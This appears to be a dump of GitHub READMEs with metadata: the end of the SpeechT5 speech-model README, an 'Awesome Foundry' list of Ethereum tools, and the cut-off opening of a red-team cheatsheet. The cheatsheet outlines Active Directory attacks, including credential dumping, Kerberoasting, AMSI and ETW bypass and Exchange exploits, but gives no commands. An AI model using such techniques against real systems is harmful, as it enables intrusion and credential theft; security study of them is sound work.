[Google drive](https://drive.google.com/file/d/162U88mwso2aVfzzPkEM2nP_vwTpcb57T/view?usp=sharing) | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Ar CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1lbTSRXewEeb2t45URunD6EiJcbniyjWW/view?usp=sharing) | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Tr CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1Er4I_jHS175pQQph223yKtiiLQ378VvH/view?usp=sharing) | | SpeechUT Base (ASR) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Azure Storage]| | SpeechUT Base (ASR) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Azure Storage]| | SpeechUT Large (ASR) | [60k hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Azure Storage]| | SpeechUT Large (ASR) | [60k hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [960 hrs LibriSpeech](http://www.openslr.org/12) | [Azure Storage]| | SpeechUT Base (En-De) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [408 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [4.6M Text](https://www.statmt.org/wmt16/) | - | [Azure Storage]| | SpeechUT Base (En-De) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [408 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [4.6M Text](https://www.statmt.org/wmt16/) | [En-De MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage]| | SpeechUT Base (En-Es) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [504 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [15M Text](https://www.statmt.org/wmt13/) | - | [Azure Storage]| | SpeechUT Base (En-Es) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [504 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [15M Text](https://www.statmt.org/wmt13/) | [En-Es MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage]| | SpeechUT Base (En-Fr) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [492 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [40M Text](https://www.statmt.org/wmt14/) | - | [Azure Storage]| | SpeechUT Base (En-Fr) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [492 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [40M Text](https://www.statmt.org/wmt14/) | [En-Fr MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage]| ## SpeechT5 Introduction Motivated by the success of T5 (Text-To-Text Transfer Transformer) in pre-trained natural language processing models, we propose a unified-modal SpeechT5 framework that explores the encoder-decoder pre-training for self-supervised speech/text representation learning. The SpeechT5 framework consists of a shared encoder-decoder network and six modal-specific (speech/text) pre/post-nets. After preprocessing the input speech/text through the pre-nets, the shared encoder-decoder network models the sequence-to-sequence transformation, and then the post-nets generate the output in the speech/text modality based on the output of the decoder. <img src="SpeechT5/speecht5_framework.png" alt="se" width="1000" /> Leveraging large-scale unlabeled speech and text data, we pre-train SpeechT5 to learn a unified-modal representation, hoping to improve the modeling capability for both speech and text. To align the textual and speech information into this unified semantic space, we propose a cross-modal vector quantization approach that randomly mixes up speech/text states with latent units as the interface between encoder and decoder. Extensive evaluations show the superiority of the proposed SpeechT5 framework on a wide variety of spoken language processing tasks, including automatic speech recognition, speech synthesis, speech translation, voice conversion, speech enhancement, and speaker identification. <!-- Model introductions, evaluation results, and model inference instructions are located in the corresponding folders. The source code is here [https://github.com/microsoft/SpeechT5/tree/main/SpeechT5]. --> ## SpeechT5 Downstream Task Performance We evaluate our models on typical spoken language processing tasks, including automatic speech recognition, text to speech, speech to text translation, voice conversion, speech enhancement, and speaker identification. ### Automatic Speech Recognition Evaluation on the [LibriSpeech](http://www.openslr.org/12) | Model |LM | dev-clean | dev-other | test-clean | test-other | | ------------- |------------- | ------| ----- | ----| ----| | wav2vec2.0 Base | - | 6.1 | 13.5 | 6.1 | 13.3 | | HuBERT Base | - | 5.5 | 13.1 | 5.8 | 13.3 | | Baseline (w/o CTC) | - | 5.8 | 12.3 | 6.2 | 12.3 | | Baseline | - | 4.9 | 11.7 | 5.0 | 11.9 | | SpeechT5 (w/o CTC) | - | 5.4 | 10.7 | 5.8 | 10.7 | | **SpeechT5** | - | **4.3** | **10.3** | **4.4** | **10.4** | | DiscreteBERT | 4-gram | 4.0 |10.9 |4.5 |12.1 | | wav2vec 2.0 Base | 4-gram | 2.7 |7.9 |3.4 |8.0 | | HuBERT Base | 4-gram | 2.7 |7.8 |3.4 |8.1 | | wav2vec 2.0 Base | Transf. | 2.2 |6.3 |2.6 |6.3 | | Baseline | Transf. | 2.3 |6.3 |2.5 |6.3 | | **SpeechT5** | Transf. | **2.1** |**5.5** |**2.4** |**5.8** | ### Text-to-Speech Evaluation on the [LibriTTS](http://www.openslr.org/60/) | Model | Naturalness | MOS | CMOS | | ------------- |------------ | ------ | ----- | | Ground Truth | - | 3.87 | - | | Baseline | 2.76 | 3.56 | 0 | | **SpeechT5** | 2.91 | **3.65** | **+0.290** | ### Speech Translation Evaluation on the [MUST-C v1](https://ict.fbk.eu/must-c/) | Model | EN-DE | EN-FR | | ------------- |------------ | ------ | | Fairseq ST | 22.70 | 32.90 | | ESPnet ST | 22.91 | 32.69 | | Adapter Tuning| 24.63 | 34.98 | | Baseline | 23.43 | 33.76 | | SpeechT5 (w/o initializing decoder) | 24.44 | 34.5 | | **SpeechT5** | **25.18** | **35.30** | ### Voice Conversion Evaluation on the [CMU Arctic](http://www.festvox.org/cmu_arctic/) | Model | WER | WER | MCD | MCD | | ------------- | ------ | ----- | ---- | ----| | | bdl to slt | clb to slt | bdl to slt | clb to slt | | VTN w/ ASR | 11.1 | 10.9 | 6.5 | 6.11 | | VTN w/ TTS | 7.6 | 9.1 | 6.33 | 13.3 | | Many-to-many VTN | - | - | 6.13 | 5.97 | | Baseline | 21.5 | 10.8 | 6.26 | 6.16 | | **SpeechT5** | **7.8** | **6.4** | **5.93**| **5.87** | ### Speech Enhancement Evaluation on the [WSJ0 Hipster AmbientMixtures (WHAM!)](http://wham.whisper.ai/) | Model | WER | | ------------- |------------ | | Ground Truth Speech | 3.2 | | Noisy Speech | 76.1 | | Baseline | 10.9 | | **SpeechT5** | **8.9** | ### Speaker Identification Evaluation on the [VoxCeleb1](https://www.robots.ox.ac.uk/~vgg/data/voxceleb/vox1.html) | Model | Acc | | ------------- |------------ | | SUPERB, wav2vec 2.0 Base | 75.18% | | SUPERB, HuBERT Base | 81.42% | | SUPERB, HuBERT Large | 90.33% | | SpeechNet, single task | 86.00% | | SpeechNet, multi-task with TTS | 87.90% | | Thin ResNet-34 | 89.00% | | Baseline | 91.92% | | **SpeechT5** | **96.49%** | ## License This project is licensed under the license found in the LICENSE file in the root directory of this source tree. Portions of the source code are based on the [FAIRSEQ](https://github.com/pytorch/fairseq) and [ESPnet](https://github.com/espnet/espnet) projects. [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct) ### Reference If you find our work is useful in your research, please cite the following paper: ```bibtex @article{Ao2021SpeechT5, title = {SpeechT5: Unified-Modal Encoder-Decoder Pre-training for Spoken Language Processing}, author = {Junyi Ao and Rui Wang and Long Zhou and Chengyi Wang and Shuo Ren and Yu Wu and Shujie Liu and Tom Ko and Qing Li and Yu Zhang and Zhihua Wei and Yao Qian and Jinyu Li and Furu Wei}, eprint={2110.07205}, archivePrefix={arXiv}, primaryClass={eess.AS}, year={2021} } ``` ```bibtex @article{Ao2022Speech2C, title = {Pre-Training Transformer Decoder for End-to-End ASR Model with Unpaired Speech Data}, author = {Junyi Ao and Ziqiang Zhang and Long Zhou and Shujie Liu and Haizhou Li and Tom Ko and Lirong Dai and Jinyu Li and Yao Qian and Furu Wei}, eprint={2203.17113}, archivePrefix={arXiv}, primaryClass={cs.SD}, year={2022} } ``` ```bibtex @article{Zhang2022Yitrans, title = {The YiTrans End-to-End Speech Translation System for IWSLT 2022 Offline Shared Task}, author = {Zhang, Ziqiang and Ao, Junyi and Zhou, Long and Liu, Shujie and Wei, Furu and Li, Jinyu}, eprint={2206.05777}, archivePrefix={arXiv}, primaryClass={cs.CL}, year={2022} } ``` ```bibtex @article{zhang2022speechut, title = {SpeechUT: Bridging Speech and Text with Hidden-Unit for Encoder-Decoder Based Speech-Text Pre-training}, author = {Zhang, Ziqiang and Zhou, Long and Ao, Junyi and Liu, Shujie and Dai, Lirong and Li, Jinyu and Wei, Furu}, eprint={2210.03730}, archivePrefix={arXiv}, primaryClass={cs.CL}, year={2022} } ``` ```bibtex @article{zhang2022speechlm, title = {SpeechLM: Enhanced Speech Pre-Training with Unpaired Textual Data}, author = {Zhang, Ziqiang and Chen, Sanyuan and Zhou, Long and Wu, Yu and Ren, Shuo and Liu, Shujie and Yao, Zhuoyuan and Gong, Xun and Dai, Lirong and Li, Jinyu and Wei, Furu}, eprint={2209.15329}, archivePrefix={arXiv}, primaryClass={cs.CL}, year={2022} } ``` ### Contact Information For help or issues using SpeechT5 models, please submit a GitHub issue. For other communications related to SpeechT5, please contact Long Zhou (`lozhou@microsoft.com`).
Unified-Modal Speech-Text Pre-Training for Spoken Language Processing
speech-pretraining,speech2c,speecht5,speechlm,speechut,speech-recognition,speech-synthesis,speech-translation,speech-text-pretraining,vallex
0
13
5
242
34
3
0
crisgarner/awesome-foundry
# Awesome Foundry [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [![Telegram Chat](https://img.shields.io/endpoint?color=neon&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Ffoundry_rs)](https://t.me/foundry_rs) [![Telegram Chat](https://img.shields.io/endpoint?color=neon&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Ffoundry_support)](https://t.me/foundry_support) [//]: # '[![Track Awesome List](https://www.trackawesomelist.com/badge.svg)](https://www.trackawesomelist.com/avelino/awesome-go/)' Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust. [Install Foundry here](https://getfoundry.sh). <img align="center" src="https://mirror.xyz/_next/image?url=https%3A%2F%2Fimages.mirror-media.xyz%2Fpublication-images%2Fkt99mFtZZ1Gl2ZbWGNI3J.png&w=3840&q=90" alt="awesome-foundry" title="awesome-foundry" /> > A curated list of awesome Foundry resources, tutorials, tools and libraries. Inspired by [awesome-go](https://github.com/avelino/awesome-go). ### Contributing Please take a quick view at the [contribution guidelines](https://github.com/crisgarner/awesome-foundry/blob/main/CONTRIBUTING.md) first. [//]: # 'Thanks to all [contributors](https://github.com/crisgarner/awesome-foundry/graphs/contributors); you rock!' #### _If you see a package or project here that is no longer maintained or is not a good fit, please submit a pull request to improve this file. Thank you!_ ## Content - [Awesome Foundry](#awesome-foundry) - [Contributing](#contributing) - [_If you see a package or project here that is no longer maintained or is not a good fit, please submit a pull request to improve this file. Thank you!_](#if-you-see-a-package-or-project-here-that-is-no-longer-maintained-or-is-not-a-good-fit-please-submit-a-pull-request-to-improve-this-file-thank-you) - [Content](#content) - [Tools](#tools) - [Templates \& Libraries](#templates--libraries) - [Tutorials](#tutorials) - [Projects Using Foundry](#projects-using-foundry) **[โฌ† back to top](#awesome-foundry)** ## Tools Frameworks, plugins and utilities for Foundry. - [Audit_Helper](https://github.com/HardlyCodeMan/audit_helper) - audit_helper is a Python3 helper script for Linux to automate some Foundry boilerplate set up in audit repositories. - [Blacksmith](https://github.com/blacksmith-eth/blacksmith) - Blacksmith generates a simple frontend for interacting with smart contracts. - [Chisel](https://github.com/foundry-rs/foundry/tree/master/chisel) - Chisel is a fast, utilitarian, and verbose solidity REPL. It is heavily inspired by the incredible work done in soli and solidity-shell! - [Foundryup](https://github.com/foundry-rs/foundry/tree/master/foundryup) - Update or revert to a specific Foundry branch with ease. - [Foundry Hardhat](https://github.com/foundry-rs/hardhat) - Hardhat plugins to use foundry tools in hardhat environments. - [Forge Deploy](https://github.com/wighawag/forge-deploy) - A cli and associated contracts to keep track of deployments by name and reuse them in solidity. It tries to keep compatibility with hardhat-deploy as far as possible (work in progress). - [Forge Standard Library](https://github.com/foundry-rs/forge-std/) - Collection of helpful contracts for use with forge and foundry. - [Forge GHA](https://github.com/foundry-rs/foundry-toolchain) - Simple Github Actions workflow to run forge test. - [Forge Replit](https://replit.com/@wilsonc/VanillaForge) - Run Forge in the browser, vanilla setup. - [Forge Safe](https://github.com/ind-igo/forge-safe) - Forge Safe lets Forge users build Gnosis Safe batch transactions using Forge scripting in Solidity. - [Forge Safer](https://github.com/morpho-labs/safer) - Safer lets users to create transactions on a Safe without relying on Safe's backend, improving resiliency of Safe multisigs. - [Forge Snippets](https://github.com/crisgarner/VSCodeForgeSnippets) - VS Code Snippets for Forge. - [ForGePT](https://forgept.apoorv.xyz/) - AI bot to provide support and answer foundry related questions. - [Foundrydeploy](https://github.com/joshieDo/foundrydeploy) - Limited scripting (declarative?) language to implement a basic deployment pipeline using foundry. - [Foundry Docgen](https://github.com/ZeframLou/foundry-docgen) - A basic tool for generating markdown docs for a Foundry project using existing NatSpec comments in the contracts. - [Foundry Gas Diff Reporter](https://github.com/Rubilmax/foundry-gas-diff) Github Action to easily compare gas reports generated by Foundry automatically on each of your Pull Requests. - [Foundry toolchain Action](https://github.com/foundry-rs/foundry-toolchain) - This GitHub Action installs Foundry, the blazing fast, portable and modular toolkit for Ethereum application development. - [Foundry Canary](https://github.com/ZeframLou/foundry-canary) - A minimal foundry repo setup for examples and finding bugs. - [Forge Proposal Simulator](https://github.com/solidity-labs-io/forge-proposal-simulator) - A tool to write, simulate and test governance proposals. - [Foundry zkSync Era](https://github.com/matter-labs/foundry-zksync) - This repository provides Foundry functionality in Solidity for compiling, deploying, and interacting with smart contracts on zkSync Era. - [Femplate](https://github.com/abigger87/femplate/) - Robust Template for Foundry Projects. - [Halmos](https://github.com/a16z/halmos#readme) - Symbolic Bounded Model Checker for Ethereum Smart Contracts Bytecode - [Hardhat Foundry](https://github.com/NomicFoundation/hardhat/releases/tag/%40nomicfoundation/hardhat-foundry%401.0.0) - This plugin makes it easier to use Hardhat and Foundry in the same project. You can use it both for adding Foundry to an existing Hardhat project, and to add Hardhat to an existing Foundry project. - [Paradigm CTF Template](https://github.com/zobront/paradigm-ctf) - Template for efficient paradigm ctf testing & scripts. - [Quick POC](https://github.com/zobront/quickpoc) - easy POC template generation from the command line. - [Solplot](https://github.com/0xClandestine/solplot) - A Foundry plugin that enables you to plot charts within solidity. - [Vulcan](https://github.com/nomoixyz/vulcan) - Development framework for Foundry projects, with a focus on developer experience and readability. ## Templates & Libraries Solidity templates, libraries or utilities that use Foundry. - [Zefram's Foundry Template](https://github.com/ZeframLou/foundry-template) - @ZeframLou's Foundry template. - [Paul's Foundry Template](https://github.com/PaulRBerg/foundry-template) - @PaulRBerg's Foundry template. - [Frankie's Forge Template](https://github.com/FrankieIsLost/forge-template) - @FrankieIsLost's template for quickly getting started with Forge. - [Immunefi's PoC Templates](https://github.com/immunefi-team/forge-poc-templates) - @Immunefi-team's templates for quickly getting started with a proof of concept for testing vulnerabilities. - [Foundry Hardhat Template](https://github.com/foundry-rs/hardhat-foundry-template) - Template repository for getting started quickly with Hardhat and Foundry in one project. - [Foundry Vyper](https://github.com/0xKitsune/Foundry-Vyper) - A Foundry template to compile and test Vyper contracts. - [Foundry Starter Kit](https://github.com/smartcontractkit/foundry-starter-kit) - Foundry Starter Kit is a repo that shows developers how to quickly build, test, and deploy smart contracts with one of the fastest frameworks out there. - [Foundry Hardhat TypeScript Template](https://github.com/pcaversaccio/hardhat-project-template-ts) - A fully-fledged Hardhat project template based on TypeScript that includes the Foundry toolkit. - [Foundry Vulcan Template](https://github.com/nomoixyz/vulcan-template) - This repository is a template for smart contract projects based on Foundry. It includes Vulcan to make your life easier when writing tests and scripts. - [Foundry <> Python Differential Fuzz Testing template](https://github.com/kjr217/foundry-python-template) - A lot of financial quant work gets modelled in Python and sometimes these models needs to be implemented in Solidity to be used in a protocol. - [Solady](https://github.com/Vectorized/solady) - Gas optimized Solidity Libraries. - [Solidify](https://github.com/proofxyz/solidify) - solidify is a golang + solidity library aimed to make storing arbitrary data on EVM blockchains as easy and efficient as possible. - [Solmate](https://github.com/transmissions11/solmate) - Modern, opinionated, and gas optimized building blocks for smart contract development. - [Chain Claim](https://github.com/botdad/chain-claim) - Solidity lib and helper scripts for providing claim code generation and on chain verification of a claim. - [Playpen](https://github.com/ZeframLou/playpen) - Set of modern, gas optimized staking pool contracts. - [TokenMigrator](https://github.com/ZeframLou/token-migrator) - A simple contract for migrating from an old ERC20 token to a new ERC20 token. - [VestedERC20](https://github.com/ZeframLou/vested-erc20) - A wrapper ERC20 token that linearly vests an underlying ERC20 token to its holders. - [forge-gas-snapshot](https://github.com/marktoda/forge-gas-snapshot) - A flexible gas snapshotting library for forge tests. - [lil web3](https://github.com/m1guelpf/lil-web3/) - Small, focused, utility-based smart contracts. - [RollCall](https://github.com/withtally/rollcall) - Rollup Governance Libraries. - [Forge Optimism](https://github.com/tarrencev/forge-optimism) - Forge Optimism is a collection of helpful contracts for use with forge and foundry on Optimism. - [Yearn Strategy Foundry Mix](https://github.com/storming0x/foundry_strategy_mix) - Basic Solidity Smart Contract for creating your own Yearn Strategy. - [Foundry-Hardhat-Diamonds](https://github.com/Timidan/Foundry-Hardhat-Diamonds)- Sleek EIP2535 Diamond deployments on the go with foundry - [Foundry Lens Protocol](https://github.com/memester-xyz/lens-protocol#foundry-setup) - Lens Protocol fork that supports Foundry. - [XChain](https://github.com/zobront/xchain) - Cross chain call library for Solidity & Foundry. - [Solenv](https://github.com/memester-xyz/solenv) - A dotenv parser for Solidity & Foundry. - [surl](https://github.com/memester-xyz/surl/) - HTTP library for Foundry tests in Solidity based on curl. - [unix](https://github.com/abigger87/unix) - A lightweight, extensible Foundry library for shell scripting. - [Chainlink Brownie Contracts](https://github.com/smartcontractkit/chainlink-brownie-contracts) - This repository is a slimmed down version of Chainlink's official repo. It clones only the Chainlink contracts folder and the repo automatically updates every time there is a new NPM release. - [Upgradeable Contracts With OpenZeppelin and Foundry](https://github.com/jordaniza/OZ-Upgradeable-Foundry) - A minimal set of contracts showing how to implement UUPS and Transparent Upgradeable Proxy contracts using foundry, along with testing and deployment with Forge Script. - [Foundry Upgrades](https://github.com/odyslam/foundry-upgrades) - Helper smart contracts to deploy and manage upgradeable contracts on Ethereum. - [PRBMath](https://github.com/paulrberg/prb-math) - Solidity library for advanced fixed-point math that operates with signed 59.18-decimal fixed-point and unsigned 60.18-decimal fixed-point numbers. - [ChugSplash Foundry](https://github.com/chugsplash/chugsplash-foundry#readme) - A Foundry library for deploying and managing upgradeable smart contracts. - [Invariant Examples](https://github.com/lucas-manuel/invariant-examples#readme) - This repository functions as an accessible example for Foundry developers to experiment and learn about invariant testing. - [Foundry Multichain](https://github.com/timurguvenkaya/foundry-multichain) - This repo provides an example of a multichain Solidity Deployment/Upgradability script pattern. - [Foundry Safer Log](https://github.com/Philogy/forge-safe-log) - The safelog library provides a foundry/hardhat like console logging interface whereby the individual log functions do not modify the state of memory. - [Diamond-Foundry](https://github.com/FydeTreasury/Diamond-Foundry) - Foundry implementation of EIP2535 Diamond standard. - [balance-snapshot](https://github.com/pilagod/balance-snapshot) - A Solidity library to improve balance change check in Foundry tests. - [Cannon](https://usecannon.com/) - Continuous configuration automation & development cli multi-tool. Like Terraform, Docker and NPM for Ethereum. ## Tutorials - [Getting Started by Crisgarner](https://mirror.xyz/crisgarner.eth/BhQzl33tthkJJ3Oh2ehAD_2FXGGlMupKlrUUcDk0ALA) - Short intro tutorial for getting started. - [Getting Started by Wilson](https://w.mirror.xyz/mOUlpgkWA178HNUW7xR20TdbGRV6dMid7uChqxf9Z58) - Extended tutorial with information about testings and logging. - [Getting Started by What The Func?](https://youtu.be/wqFnif_6Mbc) - Video tutorial. - [How to Foundry with Brock Elmore](https://www.youtube.com/watch?v=Rp_V7bYiTCM) - YouTube live code tutorial on how to get started with Foundry. - [Foundry Book](https://book.getfoundry.sh/) - A book on all things Foundry. - [Learn Solidity, Blockchain Development, & Smart Contracts] (https://www.youtube.com/watch?v=umepbfKp5rI&ab_channel=PatrickCollins) - Full introduction course into all of the core concepts related to blockchain, smart contracts, Solidity, ERC20s, full-stack Web3 dapps, decentralized finance (DeFi), Chainlink, Ethereum, upgradable smart contracts, DAOs, aave, IPFS, and more; everything build with Foundry. Video 1 out of 3. - [Mainnet Forking](https://mirror.xyz/susheen.eth/bRCzT2QLdNINMVk8251udkfjHW_T9ascCQ1DV9hURz0) - This article teaches how to run a locally simulate a swap on Uniswap. - [Ethernaut x Foundry](https://github.com/ciaranmcveigh5/ethernaut-x-foundry) - Ethernaut puzzles solved & tested with foundry. - [Damn Vulnerable Defi - Foundry Version](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry) - The Damn Vulnerable Defi CTF using Foundry. - [Getting Started (Chinese)](https://learnblockchain.cn/article/3502) - Getting started tutorial on Chinese. - [Foundry vs Hardhat](https://chainstack.com/foundry-hardhat-differences-performance/) - Differences in performance and developer experience. - [Smart Contract Development with Foundry](https://www.youtube.com/watch?v=uelA2U9TbgM) - Extended video tutorial on Foundry covering tests, deployments, cast usage, deploying to a live network. - [DeFiHackLabs](https://github.com/SunWeb3Sec/DeFiHackLabs) - Reproduce DeFi hack incidents using Foundry. - [DeFiVulnLabs](https://github.com/SunWeb3Sec/DeFiVulnLabs) - To learn common smart contract vulnerabilities using Foundry. - [How to test a contract function a million times](https://www.notonlyowner.com/learn/how-to-test-a-smart-contract-function-a-million-times/) - Tutorial about testing a function of OpenZeppelin Contracts library using foundry fuzzing. - [forge inspect $CONTRACT Tweetstorm by @w1nt3r_eth](https://twitter.com/w1nt3r_eth/status/1579486967963693057) - Twitter thread about how to use forge inspect $CONTRACT ir-optimized. - [Fork testing with Foundry against a specific block number?](https://twitter.com/PaulRBerg/status/1603057723985301507?utm_source=substack&utm_medium=email) - pro tip by @PaulRBerg. - [Using Foundry to Explore Upgradeable Contracts (Part 1)](https://runtimeverification.com/blog/using-foundry-to-explore-upgradeable-contracts-part-1) - Using Foundry tests to illustrate the various techniques used to make contracts upgradeable. - [Foundry Best Practices](https://book.getfoundry.sh/tutorials/best-practices) - This guide documents the suggested best practices when developing with Foundry. In general, it's recommended to handle as much as possible with forge fmt, and anything this doesn't handle is below. - [Invariant Testing WETH With Foundry](https://mirror.xyz/horsefacts.eth/Jex2YVaO65dda6zEyfM_-DXlXhOWCAoSpOx5PLocYgw) - In this short guide, we'll write invariant tests from the ground up for Wrapped Ether, one of the most important contracts on mainnet. - [Tic Tac Token](https://book.tictactoken.co/) - Tic Tac Token will teach you Foundry from the ground up while you create Tic Tac Toe and learn how to write and test Solidity smart contracts using Foundry. ## Projects Using Foundry - [0xHacked](https://github.com/0xHackedLabs/zkProver) - A trustless bug bounty platform built on zero-knowledge proof, where the whitehat can submit the proof of exploit to claim a bug bounty without disclosing any details. We referred to the implementation of Foundry. - [Art Gobblers](https://github.com/artgobblers/art-gobblers) - Contracts for Art Gobblers, the self-sustaining art factory, with custom ERC721 implementation with VRGDAs, GOO integration and differential fuzzing. - [OpenSea Seaport](https://github.com/ProjectOpenSea/seaport) - Seaport is a new marketplace protocol for safely and efficiently buying and selling NFTs. - [Optimism Contracts Bedrock](https://github.com/ethereum-optimism/optimism/tree/develop/packages/contracts-bedrock) - This package contains the smart contracts that compose the on-chain component of Optimism's upcoming Bedrock upgrade. - [MapleLoan](https://github.com/maple-labs/loan) - Set of contracts to facilitate on-chain Loans between Maple Finance Pools and institutional borrowers. - [Cryptex Finance](https://github.com/cryptexfinance/contracts) - Index token that tracks the total cryptocurrency market capitalization. (Optimism version uses Foundry tests). - [Gov of Venice](https://github.com/pentagonxyz/gov-of-venice) - Governance of Venice is a new paradigm in DAO governance, attempting to standardise the existence of functional groups within DAOs (Guilds) in terms of how they participate in the Governance process of different DAOs. - [Beefy Finance](https://github.com/beefyfinance/beefy-contracts) - Official repo for strategies and vaults from the Beefy yield optimizer. - [DeFi Hacks Reproduce - Foundry](https://github.com/SunWeb3Sec/DeFiHackLabs) - Reproduce DeFi hack incidents using Foundry. - [Tokenlon](https://github.com/consenlabs/tokenlon-contracts) - Tokenlon is a decentralized exchange and payment settlement protocol. - [Uniswap V3 Development Book](https://uniswapv3book.com/) - Development book about Uniswap V3 built using Foundry. - [Uniswap Permit](https://github.com/Uniswap/permit2) - Permit2 introduces a low-overhead, next generation token approval/meta-tx system to make token approvals easier, more secure, and more consistent across applications. **[โฌ† back to top](#awesome-foundry)**
A curated list of awesome of the Foundry development framework.
null
0
29
35
115
0
1
0
RistBS/Awesome-RedTeam-Cheatsheet
--- ![image](https://user-images.githubusercontent.com/75935486/169690637-2f7bd0c1-0799-4e6e-b38c-809f086ea156.png) --- # Red Team Techniques - [Initial Access Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Initial%20Access%20Techniques.md) (soon) - [Code Execution Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Code%20Execution%20Techniques.md) (soon) - [Lateral Mouvement Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Lateral%20Mouvement%20Techniques.md) (soon) - [Evasion Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Evasion%20Techniques.md) (soon) - [Persistence Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Persistence%20Techniques.md) (soon) - [Privilege Escalation Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Privilege%20Escalation%20Techniques.md) (soon) - [Credential Dumping Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Credential%20Dumping%20Techniques.md) (soon) - [Pivoting Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Pivoting%20Cheatsheet.md) (soon) --- ## Windows Protocols and Terminologies - **[Windows Protocols and Terminologies Guide](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Active%20Directory%20Protcols%20Guide.md) (soon)** --- ## Miscs - [OPSEC Guide](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/OPSEC%20Guide.md) - [Malware Development](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/Malware%20Development.md) - [Attacking AD Azure Cloud](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/Attacking%20AD%20Azure%20Cloud.md) (soon) --- # Support **You can support me here :cat: :** <a href="https://www.buymeacoffee.com/RistBS"><img width=300 src="https://img.buymeacoffee.com/button-api/?text=Buy me a Pizza&emoji=๐Ÿ•&slug=bsolomon&button_colour=5F7FFF&font_colour=000000&font_family=Poppins&outline_colour=000000&coffee_colour=ffffff"></a> # Active-directory-Cheat-sheet This AD attacks CheatSheet, made by RistBS is inspired by the [Active-Directory-Exploitation-Cheat-Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) repo. ## Summary - [AD Exploitation Cheat Sheet by RistBS](#active-directory-exploitation-cheat-sheet) - [Summary](#summary) - [Tools](#tools) - [Powershell Components](#powershell-components) - [Powershell Tricks](#powershell-tricks) - [PSWA Abusing](#pswa-abusing) - [Enumeration](#domain-enumeration) - [GPO enumeration](#gpo-enumeration) - [ACL and ACE enumeration](#acl-enumeration) - [RID Cycling](#rid-cycling) - [Privilege Escalation](#privilege-escalation) - [Token Impersonation](#token-impersonation) - [Kerberoasting](#kerberoasting) - [ASREPRoasting](#asreproasting) - [DNSAdmin](#dnsadmin) - [Lateral Mouvement](#lateral-mouvement) - [WMIExec](#wmiexec) - [Credentials Dumping](#credentials-dumping) - [LSASS Dumping](#lsass-dumping) - [NTDS Dumping](#ntds-dumping) - [DPAPI Abusing](#dpapi-abusing) - [LSA Dumping](#lsa-dumping) - [SAM Dumping](#sam-dumping) - [Dump Registry Remotely and Directly](#dump-registry-remotely-and-directly) - [Read GMSA Passwords](#read-gmsa-password) - [Hash Cracking](#hash-cracking) - [Bruteforce AD Password](#bruteforce-ad-password) - [Custom Username and Password wordlist](#custom-username-and-password-wordlist) - [Pivoting](#pivoting) - [SMB Pipes](#smb-pipes) - [SharpSocks](#sharpsocks) - [RDP Tunneling via DVC](#rdp-tunneling-via-dvc) - [Persistence](#persistence) - [SIDHistory Injection](#sidhistory-injection) - [AdminSDHolder and SDProp](#adminsdholder-and-sdprop) - [ACLs and ACEs Abusing](#acls-and-aces-abusing) - [GenericAll](#genericall) - [Enhanced Security Bypass](#enhanced-security-bypass) - [AntiMalware Scan Interface](#antimalware-scan-interface) - [ConstrainLanguageMode](#constrainlanguagemode) - [Just Enough Administration](#just-enough-administration) - [ExecutionPolicy](#executionpolicy) - [RunAsPPL for Credentials Dumping](#runasppl-for-credentials-dumping) - [ETW Disabling](#etw-disabling) - [MS Exchange](#ms-exchange) - [OWA, EWS and EAS Password Spraying](#owa-ews-and-eas-password-spraying) - [GAL and OAB Extraction](#gal-and-oab-extraction) - [PrivExchange](#privexchange) - [ProxyLogon](#proxylogon) - [CVE-2020-0688](#cve-2020-0688) - [MSSQL Server](#mssql-server) - [UNC 